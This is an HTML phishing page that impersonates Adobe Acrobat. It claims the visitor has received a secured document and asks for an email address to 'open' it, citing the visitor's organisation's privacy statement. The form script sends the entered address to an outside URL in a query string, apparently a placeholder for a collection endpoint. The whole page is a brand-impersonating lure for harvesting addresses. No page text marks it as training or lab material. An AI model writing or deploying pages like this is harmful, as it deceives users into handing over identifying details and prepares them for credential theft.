<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Adobe Secure Document Viewer</title>
  <style>
    html, body {
      margin: 0;
      padding: 0;
      height: 100%;
      font-family: Arial, sans-serif;
      background: #f0f0f0;
    }

    .background {
      background-image: url('https://sites.udel.edu/threat/files/2016/08/Screen-Shot-2016-08-30-at-11.44.04-AM-1wd5v0p.png');
      background-size: cover;
      background-position: center;
      filter: blur(6px);
      position: fixed;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      z-index: 0;
    }

    .overlay {
      position: relative;
      z-index: 1;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .modal {
      background: white;
      padding: 40px;
      border-radius: 12px;
      width: 360px;
      box-shadow: 0 0 30px rgba(0, 0, 0, 0.2);
      text-align: center;
    }

    .logo {
      font-size: 24px;
      font-weight: bold;
      color: #e71c24;
      margin-bottom: 12px;
    }

    .logo span {
      color: #333;
    }

    .subtitle {
      font-weight: bold;
      margin-bottom: 10px;
    }

    input[type="email"] {
      width: 100%;
      padding: 12px;
      margin-top: 16px;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 14px;
    }

    button {
      background-color: #e71c24;
      color: white;
      border: none;
      padding: 12px;
      width: 100%;
      font-size: 14px;
      margin-top: 20px;
      cursor: pointer;
      border-radius: 4px;
    }

    .footer {
      font-size: 11px;
      margin-top: 20px;
      color: #555;
    }
  </style>
</head>
<body>
  <div class="background"></div>

  <div class="overlay">
    <div class="modal">
      <div class="logo">Adobe <span>Acrobat</span></div>
      <div class="subtitle">You've received a secured Document</div>
      <p style="font-size: 13px;">
        The shared file will pop up on your screen after verification.<br>
        Please enter your email address to continue.
      </p>

      <form id="emailForm">
        <input type="email" id="emailInput" placeholder="Enter your email address" required>
        <button type="submit">Open in Adobe</button>
      </form>

      <div class="footer">
        By clicking open, Adobe will process your email address in accordance with your Organization's privacy statement.
        <br><br>© 2025 Organization Privacy & Cookies
      </div>
    </div>
  </div>

  <script>
    document.getElementById('emailForm').addEventListener('submit', function(e) {
      e.preventDefault();
      const email = document.getElementById('emailInput').value;
      window.location.href = "https://www.google.com/?email=" + encodeURIComponent(email);
    });
  </script>
</body>
</html>
